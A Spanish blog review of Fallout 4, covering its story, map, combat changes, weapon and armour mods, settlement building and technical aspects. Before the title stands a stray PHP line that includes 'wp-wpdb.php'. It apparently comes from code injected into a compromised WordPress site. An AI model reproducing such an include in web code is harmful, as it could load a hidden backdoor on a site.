if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Fallout 4 – La Fortaleza de LeChuck

Análisis Fallout 4

Los fans de los RPG post apocalípticos estamos de enhorabuena, llevábamos más de 5 años esperando volver a oír la famosa frase de “La guerra, la guerra nunca cambia” que tantas alegrías nos ha dado, ahora la espera ha acabado, Fallout 4 ha llegado para quedarse con un nuevo mundo por descubrir con miles de secretos y cientos de desafíos que nos mantendrán un buen número de horas pegados a un mando.

El juego ha sufrido bastantes retoques, hay muchos cambios generales y muchas nuevas mecánicas interesantes por descubrir, un nuevo mundo por explorar y una cantidad inmensa de horas por delante. Entre lo más destacable el hecho de que Bethesda haya pedido consejo a varios desarrolladores de Bungie a la hora de plantear el nuevo sistema de disparo del juego que se inspira ligeramente en Destiny para mejorar considerablemente la experiencia de juego que tanta falta hacía retocar desde el 3.

fallout4

BOSTON, UN NUEVO MUNDO

Amanecemos un idílico 23 de octubre de 2077 en un pequeño pueblecito a las afueras de Boston, nos encontramos en un mundo que ha evolucionado mediante el uso de la energía atómica como fuente de energía principal debido a que la escasez de combustibles fósiles ha creado una crisis energética a nivel mundial y es la principal causa del conflicto que acabará por destruirlo todo.

Nuestro personaje es un veterano de la guerra contra China del año 2066 y debido a nuestro servicio militar somos elegidos junto con nuestra pareja e hijo para guarecernos en uno de los lujosos refugios que Vaul Tec ha distribuido por todo el país para estar a salvo del inminente ataque que china tiene planeado contra Estados Unidos.

Y al final sucede, a media mañana la alarma suena y tenemos que coger lo puesto y huir a toda prisa al refugio 111, mientras nos adentramos en la montaña donde está el refugio vemos como la primera bomba atómica cae y arrasa con todo lo que encuentra a su paso. Una vez dentro del refugio un operario nos cuenta cómo está la situación y qué debemos hacer. Tras un par de paradas para cambiarse de ropa y un rápido chequeo médico somos introducidos en unos tubos criogénicos para poder pasar en hibernación todo el tiempo que dura la cuarentena nuclear.

fallout4-2

Aunque la realidad es otra bien distinta, el refugio tiene como finalidad realizar experimentos con la criogenia para ver su funcionamiento, cosa de la cual no somos advertidos, y como pasó en los demás refugios algo salió mal, el sistema de soporte vital empieza a fallar tras producirse un motín en el refugio y por problemas técnicos nos despertamos 200 años más tarde con un pequeño inconveniente, nuestro hijo no está, es entonces cuando tendremos que salir del refugio y recorrer el extenso yermo para buscarlo y encontrar respuestas.

La campaña se estructura en una serie de misiones principales que servirán para encontrar a nuestro hijo y resolver todo este lío, y un montón de secundarias que podrán hacerse en cualquier momento, estas misiones secundarias sirven más que nada para profundizar dentro del mundo de Fallout, ya que uno de los fuertes de esta saga han sido siempre sus microrrelatos de los sucesos ocurridos o de la gente que los ha vivido, tener en cuenta que en 200 años pasan muchas cosas, normalmente estas historias secundarias las encontraremos explorando casas y edificios a través de cartas, ordenadores, cintas de audio, etc.

El tamaño del mapa es algo que ha preocupado mucho a los jugadores tras saberse que es posible recorrerlo de punta a punta en 11 minutos, pero estaros tranquilos ya que a pesar de que se pueda recorrer muy rápido, el mapa de Fallout 4 es casi el doble de grande que el de Fallout 3 y se asemeja mucho al terreno jugable que tiene Skyrim con un total de 174 ubicaciones principales y 73 secundarias.

fallout4-3

El mapa no es el único elemento que ha sido alterado, el sistema de «looteo» se ha mejorado, ahora simplemente con apuntar a un objeto o un cadáver enemigo podremos ver los objetos que tiene sin necesidad de estar entrando y saliendo constantemente, esto resulta especialmente útil a la hora de investigar almacenes y campos de batalla.

El sistema de conversaciones se ha limitado de forma considerable, atrás quedan los largos diálogos con muchas respuestas entre las que elegir y donde nuestras habilidades tenían un peso muy importante a la hora de negociar, engañar o descubrir nuevas formas de completar las misiones, ahora solamente tenemos 4 opciones de diálogos que se resumen casi siempre en soltar un comentario sarcástico, preguntar algo y responder si o no a una misión, este posiblemente sea uno de los cambios que más perjudican al juego, sobre todo si vienes de juegos anteriores.

El sistema de cámara en tercera persona tambien ha sufrido algún que otro retoque, ahora el movimiento es bastante mas fluido a la hora de movernos y la mira de apuntado funciona de la misma forma que en primera persona a la hora de delimitar el recoil del arma o la precisión de esta.

Los V.A.T.S ahora son dinámicos, ya no se para el tiempo como pasaba antes, el tiempo ahora se ralentiza y los porcentajes se van actualizando en función del movimiento y la cobertura del enemigo, por otro lado tenemos una barra de ataque crítico que se irá rellenando poco a poco y que nos indicará cuando es posible realizar un ataque crítico en el caso de necesitarlo.

fallout4-4

MEJORANDO A NUESTRO PERSONAJE

Las armas son otra parte del juego que se ha visto sujeta a muchos cambios, para empezar las armas ya no se deterioran con el uso como pasaba en anteriores juegos, por otra parte se ha mejorado considerablemente el sistema de mejoras de arma que se implantó en el New Vegas y que nos permitía mejorar las partes del arma, en Fallout 4 han querido ir más allá y tenemos la posibilidad de elegir entre una muy amplia gama de modificaciones para nuestras armas, las posibilidades son tales que hasta podemos pasar de una simple pistola a un rifle si cambiamos las piezas adecuadas, esto no solo afecta a la forma estética del arma, si no que cada mejora le da unas características especiales, como la posibilidad de hacer más daño, de tener un mejor alcance, un cargador más amplio, etc.

fallout4-5

Las servoarmaduras también han tenido su pequeña dosis de cambio, estas ahora son mucho más poderosas que en entregas anteriores pero como contrapartida ahora requieren de núcleos de fusión para funcionar que tendremos que ir encontrando por ahí, si nos quedamos sin energía la servoarmadura no servirá para nada, una forma muy ingeniosa de evitar que los jugadores abusen de este tipo de armaduras como pasaba en los anteriores juegos, personalmente creo esto le da mucha más emoción al juego. También podemos personalizarla a nuestro antojo, no solo con diferentes partes como pasa con las armas, sino que también podremos pintarlas con diferentes esquemas de color que podremos encontrar en revistas que descubramos en el yermo.

El sistema de habilidades se ha simplificado mucho, ahora tenemos una tabla gigantesca de habilidades que podremos escoger en función de lo altas que estén nuestras habilidades S.P.E.C.I.A.L , podremos usar los puntos de nivel en cualquier momento para aumentar estas características y así poder acceder a mejorar otras habilidades, a su vez cada habilidad tiene diferentes grados, las hay que se pueden mejorar una vez y las que se pueden mejorar hasta 4 para aumentar esa característica de forma drástica como pasa con el sistema de abrir cerraduras donde a mayor nivel de habilidad mejores puertas o cajas fuertes podremos abrir.

Lo único destacable de este nuevo sistema es que ahora el nivel máximo alcanzable es el que tendremos cuando desbloqueemos todas las mejoras del árbol de habilidades, ya no tendremos limitaciones a la hora de escoger, el lado bueno de esto es que eso implica muchas horas más de juego, pero por desgracia esto hará que las habilidades ya no tengan un peso tan importante como en otros juegos ya que no habrá ningún conflicto interno a la hora de decidir si potenciar solo una habilidad o no.

fallout4-6

ASENTAMIENTOS Y ALIADOS

Una de las grandes sorpresas en la conferencia del E3 fue el anuncio del sistema de construcción de asentamientos que incluía el juego, y siendo honesto, es sin duda el mejor añadido que le han puesto al juego. Mediante el uso de materiales que nos vamos encontrando por nuestras aventuras seremos capaces de crear asentamientos en ciertas partes del mapa donde podremos construir casas, puestos de mejoras, tiendas, cultivos y puestos de defensa entre otras muchas cosas.

Esto me lleva a otro pequeño detalle que para mí puede llegar a ser un problema en determinadas ocasiones por mi avanzado síndrome de Diógenes en esta clase de juegos, y es que ahora TODOS los objetos del juego tienen un uso, ya sea para despiezarlos y conseguir materiales o como moneda de cambio cada objeto tiene su papel en nuestro inventario, y esto se traduce en problemas constates de almacenamiento, que sí, siempre se puede dejar la chatarra a un lado, pero en el momento en el que te pongas a construir cosas te van a pedir una gran cantidad de materiales que te has ido dejando por el camino.

Pero esta nueva mecánica no se limita solo a construir y cuidar a los habitantes del yermo que necesiten de un hogar, entre las recompensas que nos da el hecho de tener un buen campamento es la posibilidad de comprar en tiendas los mejores objetos que no se pueden comprar en tiendas corrientes, esto se traduce en mejor equipamiento y en una ayuda extra para el asentamiento.

Por otro lado tendremos la posibilidad de pedir ayuda a estos campamentos mediante el uso de bengalas en el caso de que nos veamos envueltos en una situación difícil, por lo que cuanto mejor equipado tengamos al asentamiento mejor cuidarán ellos de nosotros cuando más lo necesitemos

fallout4-contruccion

APARTADO TÉCNICO

Un aspecto que se ha visto cubierto de polémica es su apartado gráfico, sí que es cierto que para los tiempos que corren Fallout 4 cumple en este aspecto pero está lejos de llegar a destacar, los fans de la saga sabréis que la saga Fallout nunca ha estado en la cumbre gráfica, el juego lejos de tener un simple ciclo de día noche como en los anteriores entregas ahora tiene un sistema de luz dinámica y clima variable, no hay nada como contemplar las impresionantes tormentas radioactivas o que se ponga a llover en mitad de la noche para darte cuenta que las texturas no son lo más importante de este juego.

Se nota que han apostado más por una buena inmersión dentro del juego que por buenas texturas y al final el conjunto de todo hace que los escenarios sean bastante bonitos, aunque es una verdadera pena que el modelado de los personajes y ciertas animaciones no se hayan cuidado tanto, seguimos con los saltos ortopédicos y algunos movimientos en los V.A.T.S. que dejan mucho que desear

El apartado sonoro sí que se ha visto mejorado en gran medida, Fallout 4 tiene una excelente banda sonora que nos deleita en cada combate y paseo por el yermo, por no hablar de la cantidad ingente de emisoras de radio con las que escuchar lo que queramos, los efectos están bien representados con un sonido distinto para cada arma y para cada tipo de munición además de las pisadas y explosiones, algo que se agradece muchísimo cuando estás jugando con cascos. Por otro lado el juego viene perfectamente doblado al castellano, aunque es una pena que no se puede elegir las voces originales del juego en consola sin tener que cambiarla de región.

fallout4-7

CONCLUSIONES

Fallout 4 es un gran juego que ha cambiado muchas cosas que no funcionaban en anteriores títulos y que necesitaban urgentemente un retoque mejorando más aún la experiencia de juego que teníamos en Fallout 3 o New Vegas, pero como contrapartida gran parte del sistema de rol que ha tenido la saga desde sus inicios se ha empezado a perder, y a mí eso no me agrada demasiado, se han centrado más en la exploración y acción pura que en ofrecer un mundo más complejo.

Los entornos que se han creado para este juego son muchísimo mejores que los vistos en anteriores entregas, cosa que se agradece muchísimo vista la gran cantidad de tiempo que nos pasamos explorando el entorno, además cuentan con una gran cantidad de puntos de interés que personalmente me van a dejar pegado al mando muchas horas.

Por otra parte los usuarios de consolas ahora tienen la posibilidad de instalar mods, y a pesar de que no se sepa mucho del tema, es un gran avance, ya que en universos tan ricos y enormes como estos es de agradecer que se añada contenido para poder disfrutar más aún del juego, veremos si esta posibilidad sale adelante o simplemente se queda en una anécdota.

En definitiva, un peso pesado de los mundos post apocalípticos ha vuelto con muchas ganas de dar guerra guardando gran parte de lo que funcionaba y añadiendo nuevas opciones que ofrecen un sinfín de nuevas posibilidades.